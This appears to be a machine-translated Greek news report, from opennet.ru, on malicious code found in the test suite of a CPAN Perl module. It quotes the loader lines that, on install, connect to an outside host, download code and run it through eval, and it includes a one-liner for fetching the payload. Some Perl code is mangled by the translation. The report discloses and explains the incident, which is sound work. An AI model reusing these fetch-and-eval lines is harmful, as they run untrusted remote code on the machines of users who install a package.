Σε πακέτο Perl που διανέμεται μέσω του καταλόγου CPAN , σχεδιασμένο να φορτώνει αυτόματα τις μονάδες CPAN εν κινήσει, κακόβουλος κώδικας. Το κακόβουλο ένθετο ήταν στον κωδικό δοκιμής , η οποία αποστέλλεται από το 2011.
Αξίζει να σημειωθεί ότι προέκυψαν ερωτήσεις σχετικά με τη φόρτωση αμφισβητήσιμου κώδικα πίσω το 2016.
Η κακόβουλη δραστηριότητα συνοψίζεται σε μια προσπάθεια λήψης και εκτέλεσης κώδικα από διακομιστή τρίτου κατασκευαστή (http://r.cx:1/) κατά την εκτέλεση μιας δοκιμαστικής σουίτας που ξεκίνησε κατά την εγκατάσταση της λειτουργικής μονάδας. Υποτίθεται ότι ο κώδικας που λήφθηκε αρχικά από τον εξωτερικό διακομιστή δεν ήταν κακόβουλος, αλλά τώρα το αίτημα ανακατευθύνεται στον τομέα ww.limera1n.com, ο οποίος παρέχει το τμήμα του κώδικα για εκτέλεση.
Για να οργανώσετε τη λήψη σε ένα αρχείο Χρησιμοποιείται ο παρακάτω κώδικας:
my $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
my $try = `$^X $prog`;
Ο καθορισμένος κώδικας προκαλεί την εκτέλεση του σεναρίου , τα περιεχόμενα του οποίου μειώνονται στη γραμμή:
χρησιμοποιήστε το lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1″};
Αυτό το σενάριο φορτώνει χρησιμοποιώντας την υπηρεσία κωδικός από τον εξωτερικό κεντρικό υπολογιστή r.cx (οι κωδικοί χαρακτήρων 82.46.99.88 αντιστοιχούν στο κείμενο "R.cX") και τον εκτελεί στο μπλοκ eval.
$ perl -MIO::Socket -e’$b=new IO::Socket::INET 82.46.99.88.”:1″; εκτύπωση ;'
eval unpack u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
Μετά την αποσυσκευασία, εκτελούνται τελικά τα εξής: :
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";evalor return warn$@while$b;1
Το προβληματικό πακέτο έχει πλέον αφαιρεθεί από το αποθετήριο. (Διακομιστής μεταφόρτωσης συγγραφέων Perl) και ο λογαριασμός του συντάκτη της ενότητας έχει αποκλειστεί. Σε αυτήν την περίπτωση, η ενότητα παραμένει ακόμα στο αρχείο MetaCPAN και μπορεί να εγκατασταθεί απευθείας από το MetaCPAN χρησιμοποιώντας ορισμένα βοηθητικά προγράμματα όπως το cpanminus. ότι το πακέτο δεν διανεμήθηκε ευρέως.
Ενδιαφέρον για συζήτηση και ο συγγραφέας της ενότητας, ο οποίος αρνήθηκε τις πληροφορίες ότι εισήχθη κακόβουλος κώδικας μετά την παραβίαση του ιστότοπού του "r.cx" και εξήγησε ότι απλώς διασκέδαζε και χρησιμοποίησε το perlobfuscator.com όχι για να κρύψει κάτι, αλλά για να μειώσει το μέγεθος του κώδικα και απλοποιώντας την αντιγραφή του μέσω του πρόχειρου. Η επιλογή του ονόματος της συνάρτησης «botstrap» εξηγείται από το γεγονός ότι αυτή η λέξη «ακούγεται σαν bot και είναι πιο σύντομη από το bootstrap». Ο συγγραφέας της ενότητας διαβεβαίωσε επίσης ότι οι εντοπισμένοι χειρισμοί δεν εκτελούν κακόβουλες ενέργειες, αλλά επιδεικνύουν μόνο τη φόρτωση και την εκτέλεση κώδικα μέσω TCP.
Πηγή: opennet.ru